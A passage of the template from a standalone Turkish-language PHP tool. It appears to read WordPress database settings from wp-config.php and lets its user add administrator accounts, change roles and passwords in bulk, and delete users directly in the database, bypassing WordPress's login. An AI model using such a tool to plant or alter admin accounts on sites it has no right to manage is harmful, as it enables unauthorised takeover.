<div class="alert alert-success"><?php echo htmlspecialchars($success); ?></div>
<?php endif; ?>
<?php if (!$is_connected): ?>
<!-- Database Bağlantı Formu -->
<div class="card">
<h2>Database Bağlantı Bilgileri</h2>
<?php if (isset($_SESSION['wp_config_found']) && $_SESSION['wp_config_found']): ?>
<div class="alert alert-success" style="margin-bottom: 20px;">
✓ wp-config.php dosyası bulundu ve bilgiler otomatik yüklendi!
</div>
<?php endif; ?>
<form method="POST" action="">
<div class="form-group">
<label for="db_host">Database Host:</label>
<input type="text" id="db_host" name="db_host" value="<?php echo htmlspecialchars($db_config['host'] ?: 'localhost'); ?>" required>
</div>
<div class="form-group">
<label for="db_name">Database Adı:</label>
<input type="text" id="db_name" name="db_name" value="<?php echo htmlspecialchars($db_config['dbname']); ?>" required>
</div>
<div class="form-group">
<label for="db_user">Database Kullanıcı Adı:</label>
<input type="text" id="db_user" name="db_user" value="<?php echo htmlspecialchars($db_config['username']); ?>" required>
</div>
<div class="form-group">
<label for="db_pass">Database Şifresi:</label>
<input type="password" id="db_pass" name="db_pass" value="<?php echo htmlspecialchars($db_config['password']); ?>">
</div>
<div class="form-group">
<label for="db_prefix">Tablo Prefix:</label>
<input type="text" id="db_prefix" name="db_prefix" value="<?php echo htmlspecialchars($db_config['prefix'] ?: 'wp_'); ?>" required>
</div>
<button type="submit" name="connect" class="btn btn-primary">Bağlan</button>
</form>
</div>
<?php elseif ($action === 'add_admin'): ?>
<!-- Yönetici Ekleme Formu -->
<div class="card">
<h2>Yönetici Ekle</h2>
<form method="POST" action="">
<div class="form-group">
<label for="user_login">Kullanıcı Adı:</label>
<input type="text" id="user_login" name="user_login" value="<?php echo isset($_POST['user_login']) ? htmlspecialchars($_POST['user_login']) : ''; ?>" required>
</div>
<div class="form-group">
<label for="user_email">E-posta:</label>
<input type="email" id="user_email" name="user_email" value="<?php echo isset($_POST['user_email']) ? htmlspecialchars($_POST['user_email']) : ''; ?>" required>
</div>
<div class="form-group">
<label for="display_name">Ad Soyad:</label>
<input type="text" id="display_name" name="display_name" value="<?php echo isset($_POST['display_name']) ? htmlspecialchars($_POST['display_name']) : ''; ?>">
</div>
<div class="form-group">
<label for="user_pass">Şifre:</label>
<input type="password" id="user_pass" name="user_pass" required>
</div>
<div class="form-actions">
<button type="submit" name="add_admin" class="btn btn-success">Yönetici Ekle</button>
<a href="?action=list" class="btn btn-secondary">İptal</a>
</div>
</form>
</div>
<?php elseif ($action === 'bulk_edit' && !empty($_SESSION['bulk_edit_users'])): ?>
<!-- Toplu Düzenleme Formu -->
<div class="card">
<h2>Seçilen Kullanıcıları Düzenle (<?php echo count($_SESSION['bulk_edit_users']); ?>)</h2>
<form method="POST" action="">
<div class="form-group">
<label for="user_role">Rol Değiştir (Boş bırakırsanız değişmez):</label>
<select id="user_role" name="user_role">
<option value="">Rol Değiştirme</option>
<option value="subscriber">Abone</option>
<option value="contributor">Katkıda Bulunan</option>
<option value="author">Yazar</option>
<option value="editor">Editör</option>
<option value="administrator">Yönetici</option>
</select>
</div>
<div class="form-group">
<label for="user_pass">Şifre Değiştir (Tüm seçili kullanıcılar için aynı şifre, boş bırakırsanız değişmez):</label>
<input type="password" id="user_pass" name="user_pass" placeholder="Yeni şifre">
</div>
<div class="form-actions">
<button type="submit" name="bulk_update" class="btn btn-primary">Güncelle</button>
<a href="?action=list" class="btn btn-secondary">İptal</a>
</div>
</form>
</div>
<?php elseif ($action === 'edit' && $user): ?>
<!-- Kullanıcı Düzenleme Formu -->
<div class="card">
<h2>Kullanıcı Düzenle</h2>
<form method="POST" action="">
<input type="hidden" name="user_id" value="<?php echo $user['ID']; ?>">
<div class="form-group">
<label for="user_login">Kullanıcı Adı:</label>
<input type="text" id="user_login" name="user_login" value="<?php echo htmlspecialchars($user['user_login']); ?>" required>
</div>
<div class="form-group">
<label for="user_email">E-posta:</label>
<input type="email" id="user_email" name="user_email" value="<?php echo htmlspecialchars($user['user_email']); ?>" required>
</div>
<div class="form-group">
<label for="display_name">Ad Soyad:</label>
<input type="text" id="display_name" name="display_name" value="<?php echo htmlspecialchars($user['display_name']); ?>">
</div>
<div class="form-group">
<label for="user_pass">Yeni Şifre (Değiştirmek istemiyorsanız boş bırakın):</label>
<input type="password" id="user_pass" name="user_pass" placeholder="Yeni şifre">
</div>
<div class="form-group">
<label for="user_role">Rol:</label>
<select id="user_role" name="user_role" required>
<option value="subscriber" <?php echo $current_role === 'subscriber' ? 'selected' : ''; ?>>Abone</option>
<option value="contributor" <?php echo $current_role === 'contributor' ? 'selected' : ''; ?>>Katkıda Bulunan</option>
<option value="author" <?php echo $current_role === 'author' ? 'selected' : ''; ?>>Yazar</option>
<option value="editor" <?php echo $current_role === 'editor' ? 'selected' : ''; ?>>Editör</option>
<option value="administrator" <?php echo $current_role === 'administrator' ? 'selected' : ''; ?>>Yönetici</option>
</select>
</div>
<div class="form-actions">
<button type="submit" name="update_user" class="btn btn-primary">Güncelle</button>
<a href="?action=list" class="btn btn-secondary">İptal</a>
</div>
</form>
</div>
<?php else: ?>
<!-- Kullanıcı Listesi -->
<div class="header-actions">
<a href="?action=add_admin" class="btn btn-success">Yönetici Ekle</a>
<a href="?disconnect=1" class="btn btn-secondary">Bağlantıyı Kes</a>
</div>
<div class="card">
<h2>Kullanıcılar (<?php echo count($users); ?>)</h2>
<?php if (empty($users)): ?>
<div style="text-align: center; padding: 40px; color: #6b7280;">
<p style="font-size: 18px; margin-bottom: 10px;">Henüz kullanıcı bulunmuyor.</p>
<a href="?action=add_admin" class="btn btn-success" style="margin-top: 10px;">İlk Kullanıcıyı Ekle</a>
</div>
<?php else: ?>
<form method="POST" id="bulkForm">
<div class="bulk-actions">
<input type="checkbox" id="selectAll" class="select-all-checkbox" onchange="toggleAll(this)">
<label for="selectAll">Tümünü Seç</label>
<button type="button" class="btn btn-primary" id="bulkEditBtn" disabled onclick="handleBulkEdit()">Seçilenleri Düzenle</button>
<button type="button" class="btn btn-danger" id="bulkDeleteBtn" disabled onclick="handleBulkDelete()">Seçilenleri Sil</button>
<span id="selectedCount" style="margin-left: 10px; color: #6b7280; font-weight: 500;"></span>
</div>
<div class="table-wrapper">
<table class="user-table">
<thead>
<tr>
<th><input type="checkbox" id="selectAllHeader" onchange="toggleAll(this)"></th>
<th>ID</th>
<th>Kullanıcı Adı</th>
<th>E-posta</th>
<th>Ad Soyad</th>
<th>Rol</th>
<th>Kayıt Tarihi</th>
<th>İşlemler</th>
</tr>
</thead>
<tbody>
<?php foreach ($users as $u): ?>
<tr>
<td><input type="checkbox" name="selected_users[]" value="<?php echo $u['ID']; ?>" class="user-checkbox" onchange="updateBulkActions()"></td>
<td><?php echo htmlspecialchars($u['ID']); ?></td>
<td><?php echo htmlspecialchars($u['user_login']); ?></td>
<td><?php echo htmlspecialchars($u['user_email']); ?></td>
<td><?php echo htmlspecialchars($u['display_name'] ?: '-'); ?></td>
<td>
<?php
if (!empty($u['roles'])) {
echo '<span class="badge ' . ($u['is_admin'] ? 'badge-admin' : 'badge-user') . '">';
echo htmlspecialchars(implode(', ', $u['roles']));
echo '</span>';
} else {
echo '<span class="badge badge-user">Kullanıcı</span>';
}
?>
</td>
<td><?php
if (!empty($u['user_registered']) && $u['user_registered'] !== '0000-00-00 00:00:00') {
echo date('d.m.Y H:i', strtotime($u['user_registered']));
} else {
echo '-';
}
?></td>
<td class="actions">
<form method="POST" style="display:inline;" onsubmit="return confirm('Bu kullanıcıyı silmek istediğinizden emin misiniz?');">
<input type="hidden" name="user_id" value="<?php echo $u['ID']; ?>">
<button type="submit" name="delete_user" class="btn btn-sm btn-danger">Sil</button>
</form>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
</form>
<?php endif; ?>
</div>
<?php endif; ?>
</div>
<script>
function toggleAll(checkbox) {
const checkboxes = document.querySelectorAll('.user-checkbox');
checkboxes.forEach(cb => cb.checked = checkbox.checked);
updateBulkActions();
}
function updateBulkActions() {
const checkboxes = document.querySelectorAll('.user-checkbox:checked');
const count = checkboxes.length;
const bulkDeleteBtn = document.getElementById('bulkDeleteBtn');
const bulkEditBtn = document.getElementById('bulkEditBtn');
const selectedCount = document.getElementById('selectedCount');
const selectAllCheckbox = document.getElementById('selectAll');
const selectAllHeader = document.getElementById('selectAllHeader');
if (count > 0) {
bulkDeleteBtn.disabled = false;
bulkEditBtn.disabled = false;
selectedCount.textContent = count + ' kullanıcı seçildi';
} else {
bulkDeleteBtn.disabled = true;
bulkEditBtn.disabled = true;
selectedCount.textContent = '';
}
// Tümünü seç checkbox'ını güncelle
const allCheckboxes = document.querySelectorAll('.user-checkbox');
const allChecked = allCheckboxes.length > 0 && Array.from(allCheckboxes).every(cb => cb.checked);
if (selectAllCheckbox) selectAllCheckbox.checked = allChecked;
if (selectAllHeader) selectAllHeader.checked = allChecked;
}
function handleBulkEdit() {
const checkboxes = document.querySelectorAll('.user-checkbox:checked');
if (checkboxes.length === 0) {
alert('Lütfen en az bir kullanıcı seçin!');
return;
}
const form = document.getElementById('bulkForm');
const hiddenInput = document.createElement('input');
hiddenInput.type = 'hidden';
hiddenInput.name = 'bulk_edit';
hiddenInput.value = '1';
form.appendChild(hiddenInput);
form.submit();
}
function handleBulkDelete() {
const checkboxes = document.querySelectorAll('.user-checkbox:checked');
if (checkboxes.length === 0) {
alert('Lütfen en az bir kullanıcı seçin!');
return;
}
if (confirm('Seçili kullanıcıları silmek istediğinizden emin misiniz?')) {
const form = document.getElementById('bulkForm');
const hiddenInput = document.createElement('input');
hiddenInput.type = 'hidden';
hiddenInput.name = 'bulk_delete';
hiddenInput.value = '1';
form.appendChild(hiddenInput);
form.submit();
}
}
// Sayfa yüklendiğinde
document.addEventListener('DOMContentLoaded', function() {
updateBulkActions();
});
</script>
</body>
</html>